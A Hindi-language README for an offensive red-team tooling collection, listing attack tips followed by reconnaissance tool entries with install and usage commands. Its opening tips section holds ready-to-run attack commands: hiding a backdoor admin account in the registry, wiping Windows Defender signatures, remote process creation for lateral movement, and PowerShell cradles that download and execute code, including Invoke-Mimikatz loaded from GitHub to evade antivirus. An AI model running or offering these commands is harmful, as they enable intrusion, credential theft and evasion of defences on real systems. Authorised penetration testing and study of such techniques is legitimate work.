
परियोजना जो कई पेनटेस्ट टूल्स को एक साथ लाती है
इस रिपॉजिटरी में 200+ उपकरण और संसाधन शामिल हैं जो रेड टीमिंग गतिविधियों के लिए उपयोगी हो सकते हैं।
कुछ उपकरण विशेष रूप से रेड टीमिंग के लिए डिज़ाइन किए गए हो सकते हैं, जबकि अन्य अधिक सामान्य-उद्देश्य वाले हैं और उन्हें रेड टीमिंग संदर्भ में उपयोग के लिए अनुकूलित किया जा सकता है।
चेतावनी
इस रिपॉजिटरी में मौजूद सामग्री केवल सूचना और शैक्षिक उद्देश्यों के लिए है। इसका किसी भी अवैध गतिविधि में उपयोग करने का इरादा नहीं है।
नोट
उपकरण सूची के शीर्षकों को तीर से छुपाएं।
सूची पर वापस जाने के लिए 🔙 पर क्लिक करें।
git submodule update --init --recursive
### नया प्रोजेक्ट जोड़ें```bash
git submodule add https://github.com/example.git
docs: https://git-scm.com/book/en/v2/Git-Tools-Submodules
रेड टीमर्स से सीखें, रेड टीमिंग टिप्स के संग्रह के साथ। ये टिप्स आपकी रेड टीमिंग क्षमताओं को बेहतर बनाने के लिए विभिन्न रणनीतियों, उपकरणों और पद्धतियों को कवर करते हैं।
नोट: लगभग सभी टिप्स वर्तमान में @Alh4zr3d से हैं, वह अच्छी रेड टीम टिप्स पोस्ट करते हैं!
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /t REG_DWORD /v alh4zr3d /d 0 /f
**विवरण:** _'जब ब्लू टीम से बचते हुए अकाउंट बनाना जोखिम भरा है, लेकिन स्थानीय एडमिन बनाते समय, रजिस्ट्री में कुछ मजेदार जादू का उपयोग करके इसे छुपाएं।'_
**श्रेय:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)
**लिंक:** [Twitter](https://twitter.com/Alh4zr3d/status/1612913838999113728)
### [🔙](#tool-list)सिग्नेचर हटाकर विंडोज डिफेंडर को अपंग करें```bash
"%Program Files%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
विवरण: 'थोड़ा गड़बड़ है, लेकिन अगर Windows Defender आपको बहुत परेशान कर रहा है, तो इसे अक्षम करने (जो उपयोगकर्ता को सचेत करता है) के बजाय, आपको बस इसकी सभी हस्ताक्षरों को हटाकर इसे बेअसर कर देना चाहिए।'
श्रेय: @Alh4zr3d
लिंक: Twitter
reg add HKLM\System\CurrentControlSet\Control\TerminalServer /v fSingleSessionPerUser /d 0 /f
**विवरण:** _'कभी-कभी आप RDP या इसी तरह के माध्यम से किसी होस्ट में लॉग इन करना चाहते हैं, लेकिन आपके उपयोगकर्ता का एक सक्रिय सत्र है। प्रति उपयोगकर्ता एकाधिक सत्र सक्षम करें।'_
**श्रेय:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)
**लिंक:** [Twitter](https://twitter.com/Alh4zr3d/status/1609954528425558016)
### [🔙](#tool-list)Sysinternals PsExec.exe स्थानीय विकल्प```bash
wmic.exe /node:10.1.1.1 /user:username /password:pass process call create cmd.exe /c " command "
Description: 'अब आप लेटरल मूवमेंट के लिए Sysinternals PsExec.exe अपलोड करने से थक गए हैं? विंडोज़ में पहले से बेहतर विकल्प इंस्टॉल है। इसके बजाय इसे आज़माएं।'
Credit: @GuhnooPlusLinux
Link: Twitter
0..65535 | % {echo ((new-object Net.Sockets.TcpClient).Connect(<tgt_ip>,$)) "Port $ open"} 2>$null
**विवरण:** _'जब संभव हो, मशीनों पर टूल अपलोड करने के बजाय जमीन से जीवन यापन करें (कई कारणों से)। PowerShell/.NET मदद करते हैं। उदाहरण: PowerShell में सरल पोर्ट स्कैनर।'_
**श्रेय:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)
**लिंक:** [ट्विटर](https://twitter.com/Alh4zr3d/status/1605060950339588096)
### [🔙](#tool-list)Proxy aware PowerShell DownloadString```bash
$w=(New-Object Net.WebClient);$w.Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;IEX $w.DownloadString("<url>")
विवरण: 'अधिकांश बड़े संगठन आजकल वेब प्रॉक्सी का उपयोग कर रहे हैं। मानक PowerShell डाउनलोड क्रैडल प्रॉक्सी-अवेयर नहीं है। इसका उपयोग करें।'
श्रेय: @Alh4zr3d
लिंक: Twitter
type "C:\Users%USERNAME%\AppData\Local\Google\Chrome\User Data\Default\Bookmarks.bak" | findstr /c "name url" | findstr /v "type"
**विवरण:** _'आपको यह जानकर आश्चर्य होगा कि केवल उपयोगकर्ता के बुकमार्क से आप क्या पता लगा सकते हैं। उदाहरण के लिए, वे आंतरिक एंडपॉइंट जिन तक वे पहुँच सकते हैं।'_
**श्रेय:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)
**लिंक:** [Twitter](https://twitter.com/Alh4zr3d/status/1595488676389171200)
### [🔙](#tool-list)एनुमरेशन के लिए DNS रिकॉर्ड क्वेरी करें```bash
Get-DnsRecord -RecordType A -ZoneName FQDN -Server <server hostname>
विवरण: 'गणना खेल का 95% हिस्सा है। हालाँकि, पर्यावरण का मूल्यांकन करने के लिए बहुत सारे स्कैन लॉन्च करना बहुत शोरगुल वाला होता है। क्यों न सिर्फ DC/DNS सर्वर से सभी DNS रिकॉर्ड माँग लिया जाए?'
श्रेय: @Alh4zr3d
लिंक: Twitter
Get-CIMInstance -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$.StartMode -eq "Auto" -and $.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name
**विवरण:** _'बिना PowerUp के अनक्वोटेड सेवा पथ ढूँढना'_
**क्रेडिट:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)
**लिंक:** [Twitter](https://twitter.com/Alh4zr3d/status/1579254955554136064)
### [🔙](#tool-list)/k के साथ अक्षम कमांड प्रॉम्प्ट को बायपास करें```bash
# Win+R (To bring up Run Box)
cmd.exe /k "whoami"
विवरण: 'यह कमांड प्रॉम्प्ट आपके व्यवस्थापक द्वारा अक्षम किया गया है...' आमतौर पर कियोस्क पीसी जैसे वातावरणों में देखा जा सकता है। एक त्वरित हैकी समाधान विंडोज रन बॉक्स के माध्यम से /k का उपयोग करना है। यह कमांड को निष्पादित करेगा और फिर प्रतिबंध संदेश दिखाएगा, जिससे कमांड निष्पादन संभव होगा।
क्रेडिट: Martin Sohn Christensen
लिंक: ब्लॉग
(new-object net.webclient).downloadstring('https://raw.githubusercontent[.]com/BC-SECURITY/Empire/main/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1')|IEX;inv
**विवरण:** _'क्या आप विंडोज डिफेंडर द्वारा mimikatz.exe को डिलीट करने से थक गए हैं? इसके बजाय यह आज़माएं।'_
**श्रेय:** [@GuhnooPlusLinux](https://twitter.com/GuhnooPlusLinux)
**लिंक:** [Twitter](https://twitter.com/GuhnooPlusLinux/status/1605629049660809216)
### [🔙](#tool-list)जांचें कि क्या आप वर्चुअल मशीन में हैं```bash
reg query HKLM\SYSTEM /s | findstr /S "VirtualBox VBOX VMWare"
विवरण: 'जानना चाहते हैं कि क्या आप वर्चुअल मशीन में हैं? रजिस्ट्री कुंजियाँ क्वेरी करें और पता लगाएं!!! यदि कोई परिणाम दिखाई देते हैं तो आप वर्चुअल मशीन में हैं।'
श्रेय: @dmcxblue
लिंक: Twitter
(Get-AppLockerPolicy -Local).RuleCollections
Get-ChildItem -Path HKLM:Software\Policies\Microsoft\Windows\SrpV2 -Recurse
reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\SrpV2\Exe\
**विवरण:** _'AppLocker एक दर्द हो सकता है। यह जानने के लिए गणना करें कि यह कितना दर्दनाक है।'_
**श्रेय:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)
**लिंक:** [Twitter](https://twitter.com/alh4zr3d/status/1614706476412698624)
# टोही
### [🔙](#tool-list)crt.sh -> httprobe -> EyeWitness
मैंने एक bash one-liner बनाया है जो:
- प्रमाणपत्र संघों से उपडोमेन की सूची निष्क्रिय रूप से एकत्र करता है ([crt.sh](https://crt.sh/))
- प्रत्येक उपडोमेन का सक्रिय रूप से अनुरोध करता है ताकि उसके अस्तित्व की पुष्टि हो सके ([httprobe](https://github.com/tomnomnom/httprobe))
- मैन्युअल समीक्षा के लिए प्रत्येक उपडोमेन का सक्रिय रूप से स्क्रीनशॉट लेता है ([EyeWitness](https://github.com/FortyNorthSecurity/EyeWitness))
**उपयोग:**```bash
domain=DOMAIN_COM;rand=$RANDOM;curl -fsSL "https://crt.sh/?q=${domain}" | pup 'td text{}' | grep "${domain}" | sort -n | uniq | httprobe > /tmp/enum_tmp_${rand}.txt; python3 /usr/share/eyewitness/EyeWitness.py -f /tmp/enum_tmp_${rand}.txt --web
_नोट: आपके पास httprobe, pup और EyeWitness स्थापित होना चाहिए और 'DOMAIN_COM' को लक्ष्य डोमेन में बदलना होगा। आप इस स्क्रिप्ट को टर्मिनल विंडो में एक साथ चला सकते हैं यदि आपके पास कई लक्ष्य रूट डोमेन हैं।


एक JavaScript बुकमार्कलेट जो पृष्ठ पर सभी वेबपेज एंडपॉइंट लिंक निकालने के लिए है।
@renniepak द्वारा बनाया गया, यह JavaScript कोड स्निपेट वर्तमान वेबपेज DOM से सभी एंडपॉइंट (/ से शुरू) निकालने के लिए उपयोग किया जा सकता है, जिसमें वेबपेज पर एम्बेड किए गए सभी बाहरी स्क्रिप्ट स्रोत शामिल हैं।```javascript
javascript: (function () {
var scripts = document.getElementsByTagName("script"),
regex = /(?<=("|'|`))/[a-zA-Z0-9_?&=/-#.]*(?=("|'|`))/g;
const results = new Set();
for (var i = 0; i < scripts.length; i++) {
var t = scripts[i].src;
"" != t &&
fetch(t)
.then(function (t) {
return t.text();
})
.then(function (t) {
var e = t.matchAll(regex);
for (let r of e) results.add(r[0]);
})
.catch(function (t) {
console.log("An error occurred: ", t);
});
}
var pageContent = document.documentElement.outerHTML,
matches = pageContent.matchAll(regex);
for (const match of matches) results.add(match[0]);
function writeResults() {
results.forEach(function (t) {
document.write(t + "
");
});
}
setTimeout(writeResults, 3e3);
})();
**उपयोग (बुकमार्कलेट)**
एक बुकमार्कलेट बनाएं...
- `अपनी बुकमार्क बार पर राइट क्लिक करें`
- `'Add Page' पर क्लिक करें`
- `उपरोक्त Javascript को 'url' बॉक्स में पेस्ट करें`
- `'Save' पर क्लिक करें`
...फिर ब्राउज़र में पीड़ित पेज पर जाएं और बुकमार्कलेट पर क्लिक करें।

**उपयोग (कंसोल)**
उपरोक्त Javascript को कंसोल विंडो `F12` में पेस्ट करें और एंटर दबाएं।

### [🔙](#tool-list)[nuclei](https://github.com/projectdiscovery/nuclei)
तेज़ असुरक्षा स्कैनर जो विशिष्ट समस्याओं की खोज के लिए .yaml टेम्पलेट का उपयोग करता है।
**स्थापित करें:**```bash
go install -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest
उपयोग:```bash cat domains.txt | nuclei -t /PATH/nuclei-templates/

### [🔙](#tool-list)[nuclei-templates](https://github.com/projectdiscovery/nuclei-templates.git)
<h1 align="center">
Nuclei Templates
</h1>
<h4 align="center">समुदाय द्वारा संकलित टेम्पलेट्स की सूची जो nuclei इंजन के लिए अनुप्रयोगों में सुरक्षा कमजोरियाँ खोजने में सहायक है।</h4>
<p align="center">
<a href="https://github.com/projectdiscovery/nuclei-templates/issues"><img src="https://img.shields.io/badge/contributions-welcome-brightgreen.svg?style=flat"></a>
<a href="https://github.com/projectdiscovery/nuclei-templates/releases"><img src="https://img.shields.io/github/release/projectdiscovery/nuclei-templates"></a>
<a href="https://twitter.com/pdnuclei"><img src="https://img.shields.io/twitter/follow/pdnuclei.svg?logo=twitter"></a>
<a href="https://discord.gg/projectdiscovery"><img src="https://img.shields.io/discord/695645237418131507.svg?logo=discord"></a>
</p>
<p align="center">
<a href="https://nuclei.projectdiscovery.io/templating-guide/">दस्तावेज़ीकरण</a> •
<a href="#-contributions">योगदान</a> •
<a href="#-discussion">चर्चा</a> •
<a href="#-community">समुदाय</a> •
<a href="https://nuclei.projectdiscovery.io/faq/templates/">सामान्य प्रश्न</a> •
<a href="https://discord.gg/projectdiscovery">DC से जुड़ें</a>
</p>
---
टेम्पलेट्स [nuclei scanner](https://github.com/projectdiscovery/nuclei) का मुख्य भाग हैं जो वास्तविक स्कैनिंग इंजन को संचालित करता है।
यह रिपॉजिटरी हमारी टीम द्वारा प्रदान किए गए तथा समुदाय द्वारा योगदान किए गए स्कैनर के लिए विभिन्न टेम्पलेट्स को संग्रहीत और संरक्षित करती है।
हम आशा करते हैं कि आप भी **पुल रिक्वेस्ट** या [Github issues](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+) के माध्यम से टेम्पलेट्स भेजकर इस सूची को बढ़ाने में योगदान देंगे।
## Nuclei Templates का अवलोकन
nuclei टेम्पलेट प्रोजेक्ट का एक अवलोकन, जिसमें अनूठे टैग, लेखक, निर्देशिका, गंभीरता और टेम्पलेट के प्रकार के आँकड़े शामिल हैं। नीचे दी गई तालिका में प्रत्येक मैट्रिक्स के शीर्ष दस आँकड़े हैं; इसका विस्तृत संस्करण [यहाँ उपलब्ध है](https://gitlab.com/edu0x01/hack-tools/-/blob/master/TEMPLATES-STATS.md), और [JSON](https://gitlab.com/edu0x01/hack-tools/-/blob/master/TEMPLATES-STATS.json) प्रारूप में भी उपलब्ध है।
<table>
<tr>
<td>
## Nuclei Templates शीर्ष 10 आँकड़े
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
| --------- | ----- | ------------ | ----- | -------------------- | ----- | -------- | ----- | ---- | ----- |
| cve | 1855 | dhiyaneshdk | 835 | http | 5860 | info | 2857 | file | 123 |
| panel | 896 | dwisiswant0 | 794 | workflows | 190 | high | 1270 | dns | 18 |
| wordpress | 781 | daffainfo | 664 | file | 123 | medium | 1042 | | |
| exposure | 677 | pikpikcu | 353 | network | 93 | critical | 704 | | |
| wp-plugin | 672 | pdteam | 278 | dns | 18 | low | 216 | | |
| xss | 646 | pussycat0x | 240 | ssl | 12 | unknown | 26 | | |
| osint | 639 | geeknik | 220 | headless | 9 | | | | |
| tech | 602 | ricardomaia | 215 | TEMPLATES-STATS.json | 1 | | | | |
| edb | 596 | ritikchaddha | 210 | contributors.json | 1 | | | | |
| lfi | 548 | 0x_akoko | 179 | cves.json | 1 | | | | |
**404 निर्देशिकाएँ, 6542 फ़ाइलें**।
</td>
</tr>
</table>
## 📖 दस्तावेज़ीकरण
कृपया नए या अपने स्वयं के **कस्टम** टेम्पलेट्स **बनाने** के लिए विस्तृत दस्तावेज़ीकरण हेतु https://nuclei.projectdiscovery.io पर जाएँ।
हमने आपको यह समझने में मदद करने के लिए कुछ टेम्पलेट्स भी जोड़े हैं कि चीज़ें कैसे काम करती हैं।
## 💪 योगदान
Nuclei-templates समुदाय के प्रमुख योगदानों से संचालित है।
[टेम्पलेट योगदान](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+), [सुविधा अनुरोध](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=feature_request.md&title=%5BFeature%5D+) और [बग रिपोर्ट](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=bug_report.md&title=%5BBug%5D+) का स्वागत है।

## 💬 चर्चा
प्रश्न / संदेह / विचार हैं जिन पर चर्चा करनी है?
बेझिझक [Github चर्चा](https://github.com/projectdiscovery/nuclei-templates/discussions) बोर्ड पर चर्चा शुरू करें।
## 👨💻 समुदाय
आप सक्रिय [Discord समुदाय](https://discord.gg/projectdiscovery) में शामिल हो सकते हैं ताकि परियोजना अनुरक्षकों से सीधे बातचीत कर सकें और सुरक्षा और स्वचालन के बारे में दूसरों के साथ साझा कर सकें।
इसके अतिरिक्त, आप Nuclei से संबंधित सभी बातों पर अपडेट रहने के लिए [Twitter](https://twitter.com/pdnuclei) पर हमें फॉलो कर सकते हैं।
<p align="center">
<a href="https://github.com/projectdiscovery/nuclei-templates/graphs/contributors">
<img src="https://contrib.rocks/image?repo=projectdiscovery/nuclei-templates&max=300">
</a>
</p>
आपके योगदान और इस समुदाय को जीवंत बनाए रखने के लिए फिर से धन्यवाद। :heart:
### [🔙](#tool-list)[certSniff](https://github.com/A-poc/certSniff)
certSniff एक सर्टिफिकेट ट्रांसपेरेंसी लॉग कीवर्ड वॉचर है जिसे मैंने Python में लिखा है। यह certstream लाइब्रेरी का उपयोग करके सर्टिफिकेट निर्माण लॉग को देखता है जिसमें किसी फ़ाइल में परिभाषित कीवर्ड होते हैं।
आप इसे अपने लक्ष्य डोमेन से संबंधित कई कीवर्ड के साथ चला सकते हैं; कोई भी सर्टिफिकेट निर्माण रिकॉर्ड किया जाएगा और हो सकता है कि आपको पहले से अज्ञात डोमेन खोजने में मदद मिले।
**स्थापित करें:**```bash
git clone https://github.com/A-poc/certSniff;cd certSniff/;pip install -r requirements.txt
उपयोग:```python python3 certSniff.py -f example.txt

### [🔙](#tool-list)[gobuster](https://www.kali.org/tools/gobuster/)
पीड़ित वेबसाइट पर फ़ाइल/फ़ोल्डर पथों को ब्रूट फ़ोर्स करने के लिए बढ़िया उपकरण।
**स्थापना:**```bash
sudo apt install gobuster
उपयोग:```bash gobuster dir -u "https://google.com" -w /usr/share/wordlists/dirb/big.txt --wildcard -b 301,401,403,404,500 -t 20

### [🔙](#tool-list)[feroxbuster](https://github.com/epi052/feroxbuster)
यह एक उपकरण है जो बलपूर्वक ब्राउज़िंग (Forced Browsing) निष्पादित करने के लिए डिज़ाइन किया गया है, एक ऐसा हमला जिसका उद्देश्य उन संसाधनों की गणना करना और उन तक पहुँचना है जो वेब अनुप्रयोग द्वारा संदर्भित नहीं हैं, लेकिन फिर भी एक हमलावर के लिए सुलभ हैं।
Feroxbuster लक्ष्य निर्देशिकाओं में असंबद्ध सामग्री की खोज करने के लिए एक वर्डलिस्ट के साथ ब्रूट फोर्स (brute force) का उपयोग करता है। ये संसाधन वेब अनुप्रयोगों और संचालन प्रणालियों के बारे में संवेदनशील जानकारी, जैसे स्रोत कोड, क्रेडेंशियल, आंतरिक नेटवर्क पतों आदि को संग्रहीत कर सकते हैं।
**स्थापित करें: (Kali)**```bash
sudo apt update && sudo apt install -y feroxbuster
स्थापित करें: (Mac)```bash curl -sL https://raw.githubusercontent.com/epi052/feroxbuster/master/install-nix.sh | bash
**इंस्टॉल करें: (Windows)**```bash
Invoke-WebRequest https://github.com/epi052/feroxbuster/releases/latest/download/x86_64-windows-feroxbuster.exe.zip -OutFile feroxbuster.zip
Expand-Archive .\feroxbuster.zip
.\feroxbuster\feroxbuster.exe -V
पूर्ण स्थापना निर्देशों के लिए यहाँ देखें।
उपयोग:```bash
./feroxbuster -u http://127.1 -x pdf -x js,html -x php txt json,docx
./feroxbuster -u http://127.1 -H Accept:application/json "Authorization: Bearer {token}"
cat targets | ./feroxbuster --stdin --silent -s 200 301 302 --redirects -x js | fff -s 200 -o js-files
./feroxbuster -u http://127.1 --insecure --proxy http://127.0.0.1:8080
पूर्ण उपयोग उदाहरण [यहाँ](https://epi052.github.io/feroxbuster-docs/docs/examples/) पाए जा सकते हैं।

_चित्र https://raw.githubusercontent.com/epi052/feroxbuster/main/img/demo.gif से उपयोग किया गया_
### [🔙](#tool-list)[CloudBrute](https://github.com/0xsha/CloudBrute)
एक उपकरण जो शीर्ष क्लाउड प्रदाताओं (Amazon, Google, Microsoft, DigitalOcean, Alibaba, Vultr, Linode) पर किसी कंपनी (लक्ष्य) के बुनियादी ढांचे, फ़ाइलों और ऐप्स को खोजने में मदद करता है।
विशेषताएँ:
- क्लाउड पहचान (IPINFO API और स्रोत कोड)
- तेज़ (समवर्ती)
- क्रॉस प्लेटफ़ॉर्म (विंडोज, लिनक्स, मैक)
- User-Agent रैंडमाइज़ेशन
- प्रॉक्सी रैंडमाइज़ेशन (HTTP, Socks5)
**स्थापना:**
अपने सिस्टम के लिए नवीनतम [रिलीज़](https://github.com/0xsha/CloudBrute/releases) डाउनलोड करें और उपयोग का पालन करें।
**उपयोग:**```bash
# Specified target, generate keywords based off 'target', 80 threads with a timeout of 10, wordlist 'storage_small.txt'
CloudBrute -d target.com -k target -m storage -t 80 -T 10 -w "./data/storage_small.txt"
# Output results to file
CloudBrute -d target.com -k keyword -m storage -t 80 -T 10 -w -c amazon -o target_output.txt

https://github.com/0xsha/CloudBrute से ली गई छवि
dnsrecon एक python उपकरण है जो DNS रिकॉर्ड्स (MX, SOA, NS, A, AAAA, SPF और TXT) की गणना करने के लिए है और एक एकल डोमेन खोज से कई नए संबद्ध पीड़ित होस्ट प्रदान कर सकता है जिनमें प्रवेश किया जा सकता है।
स्थापना:```bash sudo apt install dnsrecon
**उपयोग:**```bash
dnsrecon -d google.com

Shodan सार्वजनिक बुनियादी ढांचे को क्रॉल करता है और इसे खोजने योग्य प्रारूप में प्रदर्शित करता है। कंपनी के नाम, डोमेन नाम, आईपी पते का उपयोग करके, shodan के माध्यम से आपके लक्ष्य से संबंधित संभावित कमजोर सिस्टम की खोज करना संभव है।

उपडोमेन की गणना, DNS गणना, WAF पहचान, WHOIS, पोर्ट स्कैन, wayback machine, ईमेल हार्वेस्टिंग के लिए उपकरण।
स्थापना:```bash git clone https://github.com/D3Ext/AORT; cd AORT; pip3 install -r requirements.txt
**उपयोग:**```python
python3 AORT.py -d google.com

एक प्रोग्राम जो जाँचता है कि क्या किसी डोमेन से स्पूफ किया जा सकता है। यह प्रोग्राम SPF और DMARC रिकॉर्ड्स की जाँच करता है कि क्या वे स्पूफिंग की अनुमति देने वाले कमजोर कॉन्फ़िगरेशन रखते हैं। इसके अतिरिक्त, यह सचेत करेगा यदि डोमेन में DMARC कॉन्फ़िगरेशन है जो विफल SPF/DKIM ईमेल पर मेल या HTTP अनुरोध भेजता है।
डोमेन स्पूफेबल हैं यदि निम्नलिखित में से कोई भी शर्त पूरी होती है:
~all या -all निर्दिष्ट नहीं करताp=none पर सेट है या मौजूद नहीं हैइंस्टॉल:```bash git clone https://github.com/BishopFox/spoofcheck; cd spoofcheck; pip install -r requirements.txt
**उपयोग:**```bash
./spoofcheck.py [DOMAIN]

AWSBucketDump एक उपकरण है जो AWS S3 बकेट्स को तेजी से गणना करने और दिलचस्प फ़ाइलों की खोज करने के लिए है। यह एक सबडोमेन ब्रूटफ़ोर्सर के समान है लेकिन विशेष रूप से S3 बकेट्स के लिए बनाया गया है और इसमें कुछ अतिरिक्त सुविधाएँ भी हैं जो आपको फ़ाइलों में grep करने और साथ ही दिलचस्प फ़ाइलों को डाउनलोड करने की अनुमति देती हैं।
स्थापना:``` git clone https://github.com/jordanpotti/AWSBucketDump; cd AWSBucketDump; pip install -r requirements.txt
**उपयोग:**```
usage: AWSBucketDump.py [-h] [-D] [-t THREADS] -l HOSTLIST [-g GREPWORDS] [-m MAXSIZE]
optional arguments:
-h, --help show this help message and exit
-D Download files. This requires significant diskspace
-d If set to 1 or True, create directories for each host w/ results
-t THREADS number of threads
-l HOSTLIST
-g GREPWORDS Provide a wordlist to grep for
-m MAXSIZE Maximum file size to download.
python AWSBucketDump.py -l BucketNames.txt -g interesting_Keywords.txt -D -m 500000 -d 1
GitHub से regex के साथ जानकारी खोजने के लिए बढ़िया उपकरण, जिसमें विशिष्ट GitHub उपयोगकर्ताओं और/या परियोजनाओं को खोजने की क्षमता है।
इंस्टॉल करें:``` git clone https://github.com/metac0rtex/GitHarvester; cd GitHarvester
**उपयोग:**```
./githarvester.py
TruffleHog एक उपकरण है जो git रिपॉजिटरी को स्कैन करता है और उच्च-एंट्रॉपी स्ट्रिंग्स और पैटर्न की तलाश करता है जो रहस्यों की उपस्थिति का संकेत दे सकते हैं, जैसे पासवर्ड और API कुंजियाँ। TruffleHog के साथ, आप जल्दी और आसानी से संवेदनशील जानकारी पा सकते हैं जो गलती से कमिट और पुश की गई हो सकती है।
स्थापित करें (बाइनरी): लिंक
स्थापित करें (Go):``` git clone https://github.com/trufflesecurity/trufflehog.git; cd trufflehog; go install
**उपयोग:**```
trufflehog https://github.com/trufflesecurity/test_keys

Dismap एक परिसंपत्ति खोज और पहचान उपकरण है। यह वेब/tcp/udp जैसे प्रोटोकॉल और फिंगरप्रिंट जानकारी की तेजी से पहचान कर सकता है, संपत्ति प्रकारों का पता लगा सकता है, और आंतरिक और बाहरी नेटवर्क के लिए उपयुक्त है।
Dismap के पास एक पूर्ण फिंगरप्रिंट नियम आधार है, जिसमें वर्तमान में tcp/udp/tls प्रोटोकॉल फिंगरप्रिंट और 4500+ वेब फिंगरप्रिंट नियम शामिल हैं, जो फ़ेविकॉन, बॉडी, हेडर आदि की पहचान कर सकते हैं।
स्थापना:
Dismap Linux, MacOS और Windows के लिए एक बाइनरी फ़ाइल है। चलाने के लिए संबंधित संस्करण डाउनलोड करने हेतु Release पर जाएँ:```bash
chmod +x dismap-0.3-linux-amd64 ./dismap-0.3-linux-amd64 -h
dismap-0.3-windows-amd64.exe -h
**उपयोग:**```bash
# Scan 192.168.1.1 subnet
./dismap -i 192.168.1.1/24
# Scan, output to result.txt and json output to result.json
./dismap -i 192.168.1.1/24 -o result.txt -j result.json
# Scan, Not use ICMP/PING to detect surviving hosts, timeout 10 seconds
./dismap -i 192.168.1.1/24 --np --timeout 10
# Scan, Number of concurrent threads 1000
./dismap -i 192.168.1.1/24 -t 1000

से उपयोग की गई छवि https://github.com/zhzyker/dismap
Windows और Samba सिस्टम से जानकारी एकत्र करने का एक उपकरण।
इसका उपयोग कई प्रकार की जानकारी एकत्र करने के लिए किया जा सकता है, जिनमें शामिल हैं:
स्थापित करें: (Apt)```bash sudo apt install enum4linux
**स्थापित करें: (Git)**```bash
git clone https://github.com/CiscoCXSecurity/enum4linux
cd enum4linux
उपयोग:```bash
enum4linux.pl -a 192.168.2.55
enum4linux.pl -U 192.168.2.55
enum4linux.pl -u administrator -p password -U 192.168.2.55
enum4linux.pl -G 192.168.2.55
enum4linux.pl -v 192.168.2.55
पूर्ण उपयोग जानकारी इस [ब्लॉग](https://labs.portcullis.co.uk/tools/enum4linux/) में पाई जा सकती है।

_https://allabouttesting.org/samba-enumeration-for-penetration-testing-short-tutorial/ से ली गई छवि_
### [🔙](#tool-list)[skanuvaty](https://github.com/Esc4iCEscEsc/skanuvaty)
खतरनाक रूप से तेज़ dns/network/port स्कैनर, [Esc4iCEscEsc](https://github.com/Esc4iCEscEsc) द्वारा बनाया गया, rust में लिखा गया।
आपको एक उपडोमेन फ़ाइल की आवश्यकता होगी। _उदा. [Sublist3r द्वारा उपडोमेन शब्द सूची](https://raw.githubusercontent.com/aboul3la/Sublist3r/master/subbrute/names.txt)_.
**स्थापना:**
नवीनतम रिलीज़ [यहाँ](https://github.com/Esc4iCEscEsc/skanuvaty/releases) से डाउनलोड करें।```bash
# Install a wordlist
sudo apt install wordlists
ls /usr/share/dirb/wordlists
ls /usr/share/amass/wordlists
उपयोग:```bash skanuvaty --target example.com --concurrency 16 --subdomains-file SUBDOMAIN_WORDLIST.txt

_इमेज का उपयोग किया गया: https://github.com/Esc4iCEscEsc/skanuvaty_
### [🔙](#tool-list)[Metabigor](https://github.com/j3ssie/metabigor)
Metabigor एक इंटेलिजेंस टूल है, इसका लक्ष्य OSINT कार्यों और अधिक को बिना किसी API कुंजी के करना है।
**मुख्य विशेषताएँ:**
- IP पता, ASN और संगठन के बारे में जानकारी खोजना।
- IP/CIDR पर rustscan, masscan और nmap को अधिक कुशलतापूर्वक चलाने के लिए रैपर।
- प्रमाणपत्र, whois, Google Analytics आदि विभिन्न तकनीकों को लागू करके लक्ष्य के अधिक संबंधित डोमेन ढूँढना।
- IP पते के बारे में सारांश प्राप्त करें (द्वारा संचालित [@thebl4ckturtle](https://github.com/theblackturtle))
**स्थापना:**```bash
go install github.com/j3ssie/metabigor@latest
उपयोग:```bash
echo "company" | metabigor net --org -o /tmp/result.txt
echo 'Target Inc' | metabigor cert --json | jq -r '.Domain' | unfurl format %r.%t | sort -u # this is old command
echo '1.2.3.4/24' | metabigor scan -o result.txt
echo 'example.com' | metabigor related -s 'whois'
echo 'https://example.com' | metabigor related -s 'google-analytic'

_से ली गई छवि https://github.com/j3ssie/metabigor_
### [🔙](#tool-list)[Gitrob](https://github.com/michenriksen/gitrob)
Gitrob एक उपकरण है जो Github पर सार्वजनिक रिपॉजिटरी में धकेले गए संभावित संवेदनशील फाइलों को खोजने में मदद करता है।
Gitrob किसी उपयोगकर्ता या संगठन से संबंधित रिपॉजिटरी को कॉन्फ़िगरेबल गहराई तक क्लोन करेगा और कमिट इतिहास के माध्यम से पुनरावृति करेगा और उन फाइलों को चिह्नित करेगा जो संभावित संवेदनशील फाइलों के हस्ताक्षर से मेल खाती हैं।
परिणामों को आसान ब्राउज़िंग और विश्लेषण के लिए एक वेब इंटरफ़ेस के माध्यम से प्रस्तुत किया जाएगा।
**नोट:** _Gitrob को Github API के साथ इंटरैक्ट करने के लिए एक Github एक्सेस टोकन की आवश्यकता होगी। [एक व्यक्तिगत एक्सेस टोकन बनाएं](https://help.github.com/articles/creating-a-personal-access-token-for-the-command-line/) और इसे अपने .bashrc या समान शेल कॉन्फ़िगरेशन फ़ाइल में एक पर्यावरण चर में सहेजें:_```bash
export GITROB_ACCESS_TOKEN=deadbeefdeadbeefdeadbeefdeadbeefdeadbeef
स्थापित करें: (Go)```bash go get github.com/michenriksen/gitrob
**इंस्टॉल: (बाइनरी)**
प्रत्येक रिलीज़ के लिए एक [प्री-कम्पाइल्ड संस्करण](https://github.com/michenriksen/gitrob/releases) उपलब्ध है।
**उपयोग:**```bash
# Run against org
gitrob {org_name}
# Saving session to a file
